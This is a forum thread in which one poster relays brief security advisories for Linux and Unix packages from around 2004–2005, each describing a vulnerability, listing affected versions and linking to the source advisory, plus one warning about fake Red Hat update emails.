automatic settings and the reasonable k3b defaults which allow a quick
start.

*Product : Fedora Core 2
Name : k3b
Version : 0.11.14
*

http://www.linuxsecurity.com/advisories/fedora_advisory-4951.html

eddie


----------



## eddie5659

An information leak has been detected in CUPS, the Common UNIX
Printing System, which may lead to the disclosure of sensitive
information, such as user names and passwords which are written into
log files.

The used patch only eliminates the authentication information in the
device URI which is logged in the error_log file. It does not
eliminate the URI from the environment and process table, which is why
the CUPS developers recommend that system administrators do not code
authentication information in device URIs in the first place.

http://www.linuxsecurity.com/advisories/debian_advisory-4952.html

eddie


----------



## eddie5659

The GIMP (GNU Image Manipulation Program) is a powerful image
composition and editing program, which can be extremely useful for
creating logos and other graphics for webpages. The GIMP has many of
the tools and filters you would expect to find in similar commercial
offerings, and some interesting extras as well. The GIMP provides a
large image manipulation toolbox, including channel operations and
layers, effects, sub-pixel imaging and anti-aliasing, and conversions,
all with multi-level undo.

*Product : Fedora Core 2
Name : gimp
Version : 2.0.5
*

http://www.linuxsecurity.com/advisories/fedora_advisory-4953.html

eddie


----------



## eddie5659

The libtiff package contains a library of functions for manipulating
TIFF (Tagged Image File Format) image format files. TIFF is a widely
used file format for bitmapped images. TIFF files usually end in the
.tif extension and they are often quite large.

The libtiff package should be installed if you need to manipulate TIFF
format image files.

*Product : Fedora Core 2
Name : libtiff
Version : 3.5.7
*

http://www.linuxsecurity.com/advisories/fedora_advisory-4954.html

eddie


----------



## eddie5659

Several problems have been discovered in libtiff, the Tag Image File
Format library for processing TIFF graphics files. An attacker could
prepare a specially crafted TIFF graphic that would cause the client
to execute arbitrary code or crash

*Package : tiff
*

http://www.linuxsecurity.com/advisories/debian_advisory-4960.html

eddie


----------



## eddie5659

Gaim is an instant messenger application for Microsoft Windows and Linux-based operating systems. Gaim versions prior to 1.02 are vulnerable to a buffer overflow, caused by improper bounds checking of user-supplied input when handling MSN (Microsoft Network) SLP protocol messages. By sending a specially-crafted sequence of MSN SLP messages to Gaim, a remote attacker could overflow a buffer and execute arbitrary code on the system.

*Platforms Affected:

Gaim Project: Gaim prior to 1.02 
kernel.org: Linux Any version 
Microsoft Corporation: Windows Any version 
*

http://xforce.iss.net/xforce/xfdb/17786

eddie


----------



## eddie5659

In certain configurations, it can be possible to bypass restrictions
set by the "SSLCipherSuite" directive of mod_ssl.

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-www/apache < 2.0.52 >= 2.0.52
< 2.0
2 net-www/mod_ssl < 2.8.20 >= 2.8.20
-------------------------------------------------------------------
2 affected packages on all of their supported architectures.
-------------------------------------------------------------------

*

http://www.linuxsecurity.com/advisories/gentoo_advisory-4995.html

eddie


----------



## eddie5659

Multiple integer overflow issues affecting xpdf-2.0 and xpdf-3.0.
Also programs like cups which have embedded versions of xpdf.
These can result in writing an arbitrary byte to an attacker controlled
location which probably could lead to arbitrary code execution

Multiple integer overflow issues affecting xpdf-3.0 only.
These can result in DoS or possibly arbitrary code execution

*Affected versions: 10.0, Corporate Server 2.1
*

http://www.linuxsecurity.com/advisories/mandrake_advisory-5000.html

eddie


----------



## eddie5659

Multiple integer overflow issues affecting xpdf-2.0 and xpdf-3.0.
Also programs like cups which have embedded versions of xpdf.
These can result in writing an arbitrary byte to an attacker controlled
location which probably could lead to arbitrary code execution

*Affected versions: 10.0, 9.2, Corporate Server 2.1,
Multi Network Firewall 8.2
*

http://www.linuxsecurity.com/advisories/mandrake_advisory-5002.html

eddie


----------



## eddie5659

This announcement updates mozilla packages for Conectiva Linux 9 and
10 to mozilla version 1.7.3. This updates fixes lots of
vulnerabilities

*RELEASES : 9, 10
*

http://www.linuxsecurity.com/advisories/conectiva_advisory-5004.html

eddie


----------



## eddie5659

Updated cups packages that fix denial of service issues, a security
information leak, as well as other various bugs are now available.

*. Relevant releases/architectures:

Red Hat Enterprise Linux AS version 3 - i386, ia64, ppc, ppc64, s390, s390x, x86_64
Red Hat Desktop version 3 - i386, x86_64
Red Hat Enterprise Linux ES version 3 - i386, ia64, x86_64
Red Hat Enterprise Linux WS version 3 - i386, ia64, x86_64
*

http://www.linuxsecurity.com/advisories/redhat_advisory-5005.html

eddie


----------



## eddie5659

Updated libtiff packages that fix various buffer and integer overflows are
now available.

*Relevant releases/architectures:

Red Hat Enterprise Linux AS (Advanced Server) version 2.1 - i386, ia64
Red Hat Linux Advanced Workstation 2.1 - ia64
Red Hat Enterprise Linux ES version 2.1 - i386
Red Hat Enterprise Linux WS version 2.1 - i386
Red Hat Enterprise Linux AS version 3 - i386, ia64, ppc, s390, s390x, x86_64
Red Hat Desktop version 3 - i386, x86_64
Red Hat Enterprise Linux ES version 3 - i386, ia64, x86_64
Red Hat Enterprise Linux WS version 3 - i386, ia64, x86_64
*

http://www.linuxsecurity.com/advisories/redhat_advisory-5006.html

eddie


----------



## eddie5659

iDEFENSE discovered a Denial of Service vulnerability in squid version
2.5.STABLE6 and previous. The problem is due to an ASN1 parsing error
where certain header length combinations can slip through the
validations performed by the ASN1 parser, leading to the server
assuming there is heap corruption or some other exceptional condition,
and closing all current connections then restarting.

Squid 2.5.STABLE7 has been released to address this issue; the provided
packages are patched to fix the issue.

*Affected versions: 10.0, 9.2, Corporate Server 2.1,
Multi Network Firewall 8.2
*

http://www.linuxsecurity.com/advisories/mandrake_advisory-5007.html

eddie


----------



## eddie5659

http://forums.techguy.org/t287947.html


----------



## eddie5659

Going to create a seperate sticky, just in case others don't see this one. Will remove in a week 

I'm on a mailing list for Bugtraq, and this caught my eye:

Emails that pretend to come from the Red Hat Security Team are circulating in
the wild. These emails tell users to download and install malicious updates.
These trojan updates contain malicious code designed to compromise the systems they are run on. 

Regards.
K-OTik Security Research & Survey Team 24/7



eddie


----------



## eddie5659

shadow is a freely available suite of password utilities for Unix an Linux platforms. shadow versions prior to 4.0.5 could allow a local attacker to perform unauthorized account modifications, caused by a vulnerability in the chfn and chsh change utilities. The passwd_check function in the libmisc/pwdcheck.c file fails to properly validate user privileges. A local unauthorized user could use this vulnerability to modify account information.

*Platforms Affected:

Linux: Linux Any version 
Shadow SITE: shadow prior to 4.0.5 
Various: Unix Any version 
*

http://xforce.iss.net/xforce/xfdb/17902

Regards

eddie


----------



## eddie5659

A vulnerability in mod_ssl was discovered by Hartmut Keil. After a
renegotiation, mod_ssl would fail to ensure that the requested cipher
suite is actually negotiated. The provided packages have been patched
to prevent this problem.

*Affected versions: 10.0, 10.1, 9.2, Corporate Server 2.1,
Multi Network Firewall 8.2
*

http://www.linuxsecurity.com/advisories/mandrake_advisory-5061.html

eddie


----------



## eddie5659

A buffer overflow vulnerability exists in mod_include which could
possibly allow a local attacker to gain escalated privileges.

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-www/apache < 1.3.32-r1 >= 1.3.32-r1
*

http://www.linuxsecurity.com/advisories/gentoo_advisory-5062.html

eddie


----------



## eddie5659

A vulnerability in the Speedtouch USB driver can be exploited to allow
local users to execute arbitrary code with escalated privileges

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-dialup/speedtouch < 1.3.1 >= 1.3.1
*

http://www.linuxsecurity.com/advisories/gentoo_advisory-5063.html

eddie


----------



## eddie5659

Chris Evans discovered several integer overflows in xpdf, a viewer for
PDF files, which can be exploited remotely by a specially crafted PDF
document and lead to the execution of arbitrary code.

*For the stable distribution (woody) these problems have been fixed in
version 1.00-3.2.

For the unstable distribution (sid) these problems have been fixed in
version 3.00-9.

We recommend that you upgrade your xpdf package.
*

http://www.linuxsecurity.com/advisories/debian_advisory-5064.html

eddie


----------



## eddie5659

"infamous41md" discovered several buffer overflows in libxml and
libxml2, the XML C parser and toolkits for GNOME. Missing boundary
checks could cause several buffers to be overflown, which may cause
the client to execute arbitrary code.

*Package : libxml, libxml2*

http://www.linuxsecurity.com/advisories/debian_advisory-5065.html

eddie


----------



## eddie5659

MIME-tools doesn't handle empty MIME boundaries correctly. This may
prevent some virus-scanning programs which use MIME-tools from
detecting certain viruses.

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 dev-perl/MIME-tools < 5.415 >= 5.415
*

http://www.linuxsecurity.com/advisories/gentoo_advisory-5067.html

eddie


----------



## eddie5659

pppd contains a bug that allows an attacker to crash his own
connection, but it cannot be used to deny service to other users.

http://www.linuxsecurity.com/advisories/gentoo_advisory-5068.html

eddie


----------



## eddie5659

Trustix developers discovered insecure temporary file creation in a
supplemental script in the lvm10 package that didn't check for
existing temporary directories, allowing local users to overwrite
files via a symlink attack.

*For the stable distribution (woody) this problem has been fixed in
version 1.0.4-5woody2.

For the unstable distribution (sid) this problem will be fixed soon.

We recommend that you upgrade your lvm10 package.
*

http://www.linuxsecurity.com/advisories/debian_advisory-5069.html

eddie


----------



## eddie5659

This announcement fixes a denial of service vulnerability[2] in squid
caused by a malformed NTLMSSP packet. This causes a negative value to
be passed to memcpy on servers with NTLM authentication enabled,
making squid abort and causing a denial of service condition.

*RELEASES : 9, 10
*

http://www.linuxsecurity.com/advisories/conectiva_advisory-5071.html

eddie


----------



## eddie5659

Proxytunnel is vulnerable to a format string vulnerability, potentially
allowing a remote server to execute arbitrary code with the rights of
the Proxytunnel process.

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-misc/proxytunnel < 1.2.3 >= 1.2.3

*

http://www.linuxsecurity.com/advisories/gentoo_advisory-5072.html

eddie


----------



## eddie5659

The PNG image decoding routines in the GD library contain an integer
overflow that may allow execution of arbitrary code with the rights of
the program decoding a malicious PNG image.

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 media-libs/gd < 2.0.32 >= 2.0.32

*

http://www.linuxsecurity.com/advisories/gentoo_advisory-5073.html

eddie


----------



## eddie5659

HP OpenView Operations is a platform that is used to monitor, control, and report on the health of the operating system. HP OpenView Operations versions 7.x and 8.0 running on HP-UX, 7.x and 8.0 running on Solaris, and OpenView VantagePoint versions 6.x running on HP-UX and Solaris could allow a remote authenticated attacker to gain elevated privileges on the system, caused by an unspecified vulnerability. An unauthorized operator could use this vulnerability to launch further attacks against the system.

*Platforms Affected:

Hewlett-Packard Company: HP OpenView Operations 7.x 
Hewlett-Packard Company: HP OpenView Operations 8.0 
Hewlett-Packard Company: HP OpenView VantagePoint 6.x *

http://xforce.iss.net/xforce/xfdb/17932

Regards

eddie


----------



## eddie5659

SASL[1] is the Simple Authentication and Security Layer, a method for
adding authentication support to connection-based protocols.

A vulnerability[2] has been discovered in the Cyrus implementation of
the SASL library. The library honors the environment variable
SASL_PATH blindly, which allows a local attacker to link against a
malicious library to run arbitrary code with the privileges of a
setuid or setgid application.

*RELEASES : 9, 10
*

http://www.linuxsecurity.com/advisories/conectiva_advisory-5150.html

eddie


----------



## eddie5659

Pavuk contains multiple buffer overflows that can allow a remote
attacker to run arbitrary code.

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-misc/pavuk < 0.9.31 >= 0.9.31*

http://www.linuxsecurity.com/advisories/gentoo_advisory-5151.html

eddie


----------



## eddie5659

Ulf Härnhammar from the Debian Security Audit Project discovered a
format string vulnerability in ez-ipupdate, a client for many dynamic
DNS services. This problem can only be exploited if ez-ipupdate is
running in daemon mode (most likely) with many but not all service
types.

For the stable distribution (woody) this problem has been fixed in
version 3.0.11b5-1woody2.

For the unstable distribution (sid) this problem has been fixed in
version 3.0.11b8-8.

We recommend that you upgrade your ez-ipupdate package

http://www.linuxsecurity.com/advisories/debian_advisory-5162.html

eddie


----------



## eddie5659

ez-ipupdate is a freely available tool used to update host names for Linux, BSD and Solaris platforms. ez-ipupdate versions 3.0.11b8, 3.0.11b7, 3.0.11b6, 3.0.11b5 and 3.0.10 could allow a remote attacker to execute arbitrary commands on a vulnerable client, caused by a format string vulnerability in the show_message function. If daemon mode is enabled, a remote attacker in control of a malicious server could supply a specially-crafted response containing format specifiers to execute arbitrary commands on the victim's system.

*Platforms Affected:

Angus' Projects: ez-ipupdate 3.0.10 
Angus' Projects: ez-ipupdate 3.0.11b5 
Angus' Projects: ez-ipupdate 3.0.11b6 
Angus' Projects: ez-ipupdate 3.0.11b7 
Angus' Projects: ez-ipupdate 3.0.11b8 
Debian Project: Debian Linux 3.0 
Gentoo Technologies, Inc.: Gentoo Linux Any version 
MandrakeSoft, Inc.: Mandrake Linux 10.0 
MandrakeSoft, Inc.: Mandrake Linux 10.1 
MandrakeSoft, Inc.: Mandrake Linux 9.2 
MandrakeSoft, Inc.: Mandrake Linux Corporate Server 2.1 
MandrakeSoft, Inc.: Mandrake Multi Network Firewall 8.2 
*

http://xforce.iss.net/xforce/xfdb/18032

eddie


----------



## eddie5659

Apache HTTP Server versions 2.0.52 and earlier running on Unix platforms are vulnerable to a denial of service attack. By sending a specially-crafted HTTP GET requests, a remote attacker could cause the server to consume all available CPU resources and hang.

*Platforms Affected:

Apache Software Foundation: Apache HTTP Server 2.0.52 and earlier 
Gentoo Technologies, Inc.: Gentoo Linux Any version 
Red Hat, Inc.: Red Hat Desktop 3 
Red Hat, Inc.: Red Hat Enterprise Linux 3AS 
Red Hat, Inc.: Red Hat Enterprise Linux 3ES 
Red Hat, Inc.: Red Hat Enterprise Linux 3WS 
Ubuntu and Canonical: Ubuntu 4.10 
Various: Unix Any version 
*

http://xforce.iss.net/xforce/xfdb/17930

eddie


----------



## eddie5659

[email protected] is a freely available program that analyzes radio telescope data for the Search for Extraterrestrial Intelligence (SETI). GIMPS (Great Internet Mersenne Prime Search) is a program or finding Mersenne Primes. ChessBrain is the distributed chess supercomputer client. [email protected], GIMPS and ChessBrain allows init scripts to execute user-owned files with root privileges. A local attacker could use this vulnerability to gain elevated privileges.

*Platforms Affected:

Gentoo Technologies, Inc.: Gentoo Linux Any version 
GIMPS: GIMPS Any version 
[email protected]: [email protected] Any version 
The ChessBrain project: ChessBrain Any version *

http://xforce.iss.net/xforce/xfdb/18149

eddie


----------



## eddie5659

"infamous41md" discovered a buffer overflow condition in hpsockd, the
socks server written at Hewlett-Packard. An exploit could cause the
program to crash or may have worse effect.

*For the stable distribution (woody) this problem has been fixed in
version 0.6.woody1.

For the unstable distribution (sid) this problem has been fixed in
version 0.14.
*

http://www.linuxsecurity.com/content/view/117313/100/

eddie


----------



## eddie5659

Stefan Esser reported various bugs within the Cyrus IMAP Server.
These include buffer overflows and out-of-bounds memory access
which could allow remote attackers to execute arbitrary commands
as root. The bugs occur in the pre-authentication phase, therefore
an update is strongly recommended

*Affected products:

8.1, 8.2, 9.0, 9.1, 9.2
SUSE Linux Enterprise Server 8, 9
SuSE-Linux-Standard-Server 8
SuSE Linux Openexchange Server 4

*

http://www.linuxsecurity.com/content/view/117317/112/

eddie


----------



## eddie5659

rssh and scponly do not filter command-line options that can be
exploited to execute any command, thereby allowing a remote user to
completely bypass the restricted shell.

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-misc/scponly < 4.0 >= 4.0
2 app-shells/rssh <= 2.2.2 Vulnerable!
-------------------------------------------------------------------
NOTE: Certain packages are still vulnerable. Users should migrate
to another package if one is available or wait for the
existing packages to be marked stable by their
architecture maintainers.
-------------------------------------------------------------------
2 affected packages on all of their supported architectures.
-------------------------------------------------------------------*

http://www.linuxsecurity.com/content/view/117364/104/

eddie


----------



## eddie5659

The recent update to cyrus-imapd-2.2.10-1.fc2 for security exploits
revealed a package installation problem

*Product : Fedora Core 2
Name : cyrus-imapd
Version : 2.2.10
Release : 3.fc2
*

http://www.linuxsecurity.com/content/view/117366/102/

eddie


----------



## eddie5659

The recent update to cyrus-imapd-2.2.10-1.fc3 for security exploits revealed a package installation problem

*Product : Fedora Core 3
Name : cyrus-imapd
Version : 2.2.10
Release : 3.fc3
*

http://www.linuxsecurity.com/content/view/117367/102/

eddie


----------



## eddie5659

The Trustix developers found that the der_chop script, included in the
openssl package, created temporary files insecurely. This could allow
local users to overwrite files using a symlink attack.

*Affected versions:

10.0, 10.1, 9.2, Corporate Server 2.1,
Multi Network Firewall 8.2

*

http://www.linuxsecurity.com/content/view/117412/106/

eddie


----------



## eddie5659

The updated version of Midnight Commander contains finished CAN-2004-0494 security fixes in extfs scripts and has better support for UTF-8, contains subshell prompt fixes and enhanced large file support.

*Product : Fedora Core 3
Name : mc
Version : 4.6.1
Release : 0.11FC3
*

http://www.linuxsecurity.com/content/view/117417/102/

eddie


----------



## eddie5659

udev is a implementation of devfs in userspace using sysfs and /sbin/hotplug. It requires a 2.6 kernel to run properly.

*Product : Fedora Core 3
Name : udev
Version : 039
Release : 10.FC3.4
*

http://www.linuxsecurity.com/content/view/117418/102/

eddie


----------



## eddie5659

fixed udev.rules for cdrom symlinks (bug 141897)

*Product : Fedora Core 3
Name : udev
Version : 039
Release : 10.FC3.5
*

http://www.linuxsecurity.com/content/view/117419/102/

eddie


----------



## eddie5659

fixed again gnome-bluetooth-manager script for 64bit (bug 134864)

*Product : Fedora Core 3
Name : gnome-bluetooth
Version : 0.5.1
Release : 5.FC3.1
*

http://www.linuxsecurity.com/content/view/117420/102/

eddie


----------



## eddie5659

MaxDB is a SAP-certified open-source database for Online Transaction Processing (OLTP) and On-Line Analytical Processing (OLAP) usage. MaxDB versions 7.5.00.18 and earlier are vulnerable to a stack-based buffer overflow in the WebDav server. A remote attacker could exploit this vulnerability to overflow a buffer and execute arbitrary code on the system with root privileges.

*Platforms Affected:

Hewlett-Packard Company: Compaq Tru64 UNIX 5.1 
Hewlett-Packard Company: Compaq Tru64 UNIX 5.1a 
Hewlett-Packard Company: Compaq Tru64 UNIX 5.1b 
Hewlett-Packard Company: HP-UX 11.00 
Hewlett-Packard Company: HP-UX 11.11 
Hewlett-Packard Company: HP-UX 11.23 
IBM: AIX 5.1 
IBM: AIX 5.2 
Microsoft Corporation: Windows 2000 Professional 
Microsoft Corporation: Windows 2003 Server 
Microsoft Corporation: Windows XP Any version 
MySQL: MaxDB 7.5.00.18 - earlier 
Sun Microsystems: Solaris 8 
Sun Microsystems: Solaris 9 
SuSE: SuSE Linux 8.0 
SuSE: SuSE Linux 9.0 
*

http://xforce.iss.net/xforce/xfdb/18386

eddie


----------



## eddie5659

This update fixes problems occurring on 64-bit platforms

*Product : Fedora Core 2
Name : postgresql-odbc
Version : 7.3
Release : 6.2
*

http://www.linuxsecurity.com/content/view/117447/102/

eddie


----------



## eddie5659

This update fixes problems occurring on 64-bit platforms

*Product : Fedora Core 3
Name : postgresql-odbc
Version : 7.3
Release : 8.FC3.1
*

http://www.linuxsecurity.com/content/view/117448/102/

eddie


----------



## eddie5659

This update synchronizes PostgreSQL for FC2 with the version already released in FC3.

*Product : Fedora Core 2
Name : postgresql
Version : 7.4.6
Release : 1.FC2.1
*

http://www.linuxsecurity.com/content/view/117449/102/

eddie


----------



## eddie5659

A regression has been fixed where strict enforcement of POSIX rules for user and group names prevented Samba 3 from using its "add machine script" feature with useradd. Also, the maximum length for a username/groupname is now 31 (previously it was 32). The lastlog command can now handle extremely large (greater than 4GB) lastlogs.

*Product : Fedora Core 2
Name : shadow-utils
Version : 4.0.3
Release : 55
*

http://www.linuxsecurity.com/content/view/117452/102/

eddie


----------



## eddie5659

A regression has been fixed where strict enforcement of POSIX rules for user and group names prevented Samba 3 from using its "add machine script" feature with useradd. Also, the maximum length for a username/groupname is now 31 (previously it was 32). The lastlog command can now handle extremely large (greater than 4GB) lastlogs.

*Product : Fedora Core 3
Name : shadow-utils
Version : 4.0.3
Release : 56
*

http://www.linuxsecurity.com/content/view/117453/102/

eddie


----------



## eddie5659

Updated imlib packages that fix several integer and buffer overflows are now available.

*2. Relevant releases/architectures:

Red Hat Enterprise Linux AS (Advanced Server) version 2.1 - i386, ia64
Red Hat Linux Advanced Workstation 2.1 - ia64
Red Hat Enterprise Linux ES version 2.1 - i386
Red Hat Enterprise Linux WS version 2.1 - i386
Red Hat Enterprise Linux AS version 3 - i386, ia64, ppc, s390, s390x, x86_64
Red Hat Desktop version 3 - i386, x86_64
Red Hat Enterprise Linux ES version 3 - i386, ia64, x86_64
Red Hat Enterprise Linux WS version 3 - i386, ia64, x86_64
*

http://www.linuxsecurity.com/content/view/117455/110/

eddie


----------



## eddie5659

PHProjekt contains a vulnerability in the setup procedure allowing remote users without admin rights to change the configuration

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 www-apps/phprojekt < 4.2-r1 >= 4.2-r1*

http://www.linuxsecurity.com/content/view/117468/104/

eddie


----------



## eddie5659

Numerous issues in the Linux ELF binary loader. Issues relating to IDE DMA transfers which prevent installation on machines with SiS chipsets using the SiS 962/963 IDE controller. Null pointer dereferencing in the SG driver

*Affected Products:
- Turbolinux 10 Server
*

http://www.linuxsecurity.com/content/view/117471/113/

eddie


----------



## eddie5659

MediaWiki is a freely available editing program for Wikipedia, an encyclopedia program, for Linux operating systems. MediaWiki version 1.3.8 and possibly earlier versions could allow a remote attacker to execute arbitrary scripts, caused by improper validation of files uploaded to the 'images' directory inside the Web root directory. A remote attacker could exploit this vulnerability by uploading files to the 'images' directory to execute arbitrary scripts on the system.

*Platforms Affected:

Linux: Linux Any version 
The Wikimedia Foundation, Inc.: MediaWiki 1.3.8 
*

http://xforce.iss.net/xforce/xfdb/18425

eddie


----------



## eddie5659

Two security problems were found by Bartlomiej Sieka. They concern the lppasswd utility, which can be made to cause a denial of service, and the hpgltops filter, which can be exploited to run code remotely as the user "lp". These problems have both been fixed

*Product : Fedora Core 2
Name : cups
Version : 1.1.20
Release : 11.7
*

http://www.linuxsecurity.com/content/view/117540/102/

eddie


----------



## eddie5659

Two security problems were found by Bartlomiej Sieka. They concern the lppasswd utility, which can be made to cause a denial of service, and the hpgltops filter, which can be exploited to run code remotely as the user "lp". These problems have both been fixed.

*Product : Fedora Core 3
Name : cups
Version : 1.1.22
Release : 0.rc1.8.1
*

http://www.linuxsecurity.com/content/view/117541/102/

eddie


----------



## eddie5659

Update to PyGreSQL 3.6 (to fix bug #142711). Adjust a few file permissions (bug #142431). Assign %{_libdir}/pgsql to base package instead of -server (bug #74003)

*Product : Fedora Core 2
Name : postgresql
Version : 7.4.6
Release : 1.FC2.2
*

http://www.linuxsecurity.com/content/view/117542/102/

eddie


----------



## eddie5659

Update to PyGreSQL 3.6 (to fix bug #142711). Adjust a few file permissions (bug #142431). Assign %{_libdir}/pgsql to base package instead of -server (bug #74003)

*Product : Fedora Core 3
Name : postgresql
Version : 7.4.6
Release : 1.FC3.2
*

http://www.linuxsecurity.com/content/view/117543/102/

eddie


----------



## eddie5659

Samba contains a bug that could lead to remote execution of arbitrary code.

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-fs/samba <= 3.0.9 >= 3.0.9-r1

*

http://www.linuxsecurity.com/content/view/117560/104/

eddie


----------



## eddie5659

KorWeblog is a PHP and MySQL weblog for Linux-based operating systems. KorWeblog versions 1.6.2-cvs and earlier could allow a remote attacker to include malicious PHP files. A remote attacker could send a specially-crafted URL request to the index.php script that uses the lng variable to specify a malicious file from a remote system, which would allow the attacker to execute code on the vulnerable system.

*Platforms Affected:

korweblog: KorWeblog 1.6.2-cvs and prior 
Linux: Linux Any version 
*

http://xforce.iss.net/xforce/xfdb/18717

eddie


----------



## eddie5659

The updated tetex package fixes a buffer overflow which allows attackers to cause the internal xpdf library used by applications in tetex to crash, and possibly to execute arbitrary code. The Common Vulnerabilities and Exposures projects (cve.mitre.org) has assigned the name CAN-2004-1125 to this issue

*Product : Fedora Core 2
Name : tetex
Version : 2.0.2
Release : 14FC2.1
*

http://www.linuxsecurity.com/content/view/117742/102/

eddie


----------



## eddie5659

The updated tetex package fixes a buffer overflow which allows attackers to cause the internal xpdf library used by applications in tetex to crash, and possibly to execute arbitrary code. The Common Vulnerabilities and Exposures projects (cve.mitre.org) has assigned the name CAN-2004-1125 to this issue.

*Product : Fedora Core 3
Name : tetex
Version : 2.0.2
Release : 21.2
*

http://www.linuxsecurity.com/content/view/117743/102/

eddie


----------



## eddie5659

Jonathan Rockway discovered a buffer overflow in nasm, the general-purpose x86 assembler, which could lead to the execution of arbitrary code when compiling a maliciously crafted assembler source file

http://www.linuxsecurity.com/content/view/117756/100/

eddie


----------



## eddie5659

LinPopUp contains a buffer overflow potentially allowing execution of arbitrary code

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-im/linpopup < 2.0.4-r1 >= 2.0.4-r1

*

http://www.linuxsecurity.com/content/view/117760/104/

eddie


----------



## eddie5659

The fixps and psmandup scripts in the a2ps package are vulnerable to symlink attacks, potentially allowing a local user to overwrite arbitrary files

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 app-text/a2ps < 4.13c-r2 >= 4.13c-r2

*

http://www.linuxsecurity.com/content/view/117761/104/

eddie


----------



## eddie5659

A buffer overflow in o3read allows an attacker to execute arbitrary code by way of a specially crafted XML file.

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 app-text/o3read <= 0.0.3 >= 0.0.4

*

http://www.linuxsecurity.com/content/view/117867/104/

eddie


----------



## eddie5659

HylaFAX is subject to a vulnerability in its username matching code, potentially allowing remote users to bypass access control lists

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-misc/hylafax < 4.2.0-r2 >= 4.2.0-r2
*

http://www.linuxsecurity.com/content/view/117868/104/

eddie


----------



## eddie5659

Patrice Fournier discovered a vulnerability in the authorisation subsystem of hylafax, a flexible client/server fax system. A local or remote user guessing the contents of the hosts.hfaxd database could gain unauthorised access to the fax system.

http://www.linuxsecurity.com/content/view/117872/100/

eddie


----------



## eddie5659

poppassd_pam allows anyone to change any user's password without authenticating the user first

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
net-mail/poppassd_ceti <= 1.0 >= 1.8.4
net-mail/poppassd_pam <= 1.0 Vulnerable!
-------------------------------------------------------------------*

http://www.linuxsecurity.com/content/view/117874/104/

eddie


----------



## eddie5659

This update fixes the mouting of usbfs on boot, along with various other accumulated fixes

*Product : Fedora Core 2
Name : initscripts
Version : 7.55.2 
Release : 1 *

http://www.linuxsecurity.com/content/view/117875/102/

eddie


----------



## eddie5659

An updated nfs-utils package that fixes various security issues is now available.

http://www.linuxsecurity.com/content/view/117896/110/

eddie


----------



## eddie5659

An updated Pine package is now available for Red Hat Enterprise Linux 2.1 to fix a denial of service attack.

http://www.linuxsecurity.com/content/view/117897/110/

eddie


----------



## eddie5659

Updated Xpdf packages that fix several security issues are now available

http://www.linuxsecurity.com/content/view/117898/110/

eddie


----------



## eddie5659

Allow dhcpd and nscd to read certs files in usr_t. Allow postgresql to use ypbind and fix db creation calls.

*Product : Fedora Core 3
Name : selinux-policy-targeted
Version : 1.17.30
Release : 2.72
*

http://www.linuxsecurity.com/content/view/117899/102/

eddie


----------



## eddie5659

Buffer overflow vulnerabilities, which could lead to arbitrary code execution, have been found in the handling of IPv6 addresses as well as in the SPA authentication mechanism in Exim.

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 mail-mta/exim < 4.43-r2 >= 4.43-r2

*

http://www.linuxsecurity.com/content/view/117900/104/

eddie


----------



## eddie5659

Linux kernel versions 2.2 through 2.2.27-rc1, 2.4 through 2.4.29-rc1, and 2.6 through 2.6.10 could allow a local attacker to gain elevated privileges on the system, caused by a race condition in the SMP page fault handler.

*Platforms Affected:

kernel.org: Linux kernel 2.2 - 2.2.27-rc1 
kernel.org: Linux kernel 2.4 - 2.4.29-rc1 
kernel.org: Linux kernel 2.6 through 2.6.10 
Linux: Linux Any version*

http://xforce.iss.net/xforce/xfdb/18849

eddie


----------



## eddie5659

The GIMP User Manual is a newly written User Manual for the GIMP

*Product : Fedora Core 3
Name : gimp-help
Version : 2
*

http://www.linuxsecurity.com/content/view/117953/102/

eddie


----------



## eddie5659

clip thumbnail quality at 75 and don't barf on saving images at quality 0

*Product : Fedora Core 3
Name  : gimp
Version : 2.2.2
*

http://www.linuxsecurity.com/content/view/117954/102/

eddie


----------



## eddie5659

This is a bug fix update for the Dovecot IMAP server. This brings the Red Hat Dovecot rpm up to date with the latest upstream release from Timo Sirainen, version 0.99.13 released on Jan 6th 2005.

*Product : Fedora Core 3
Name : dovecot
Version : 0.99.13 *

http://www.linuxsecurity.com/content/view/117956/102/

eddie


----------



## eddie5659

A known exploit can break a chroot prison

*Vulnerable Supported Versions

UnixWare 7.1.4
UnixWare 7.1.3
UnixWare 7.1.1
*

http://www.linuxsecurity.com/content/view/117959/98/

eddie


----------



## eddie5659

MySQL is a popular, freely distributed relational database server often used as a back-end for Web sites. MySQL version 4.x could allow a local attacker to launch a symlink attack, caused by a vulnerability in the mysqlaccess script. The mysqlaccess script creates insecure temporary files. A local attacker could use this vulnerability to create symbolic links from a temporary file to overwrite arbitrary files on the system with user privileges

*Platforms Affected:

Apple Computer, Inc.: Mac OS Any version 
Cisco Systems, Inc.: Cisco IOS Any version 
Data General: DG/UX Any version 
Hewlett-Packard Company: Compaq Tru64 UNIX Any version 
Hewlett-Packard Company: HP-UX Any version 
http://www.mysql.com/: MySQL 4.x 
IBM: AIX Any version 
IBM: OS/2 Any version 
Linux: Linux Any version 
Microsoft Corporation: Windows 95 
Microsoft Corporation: Windows 98 
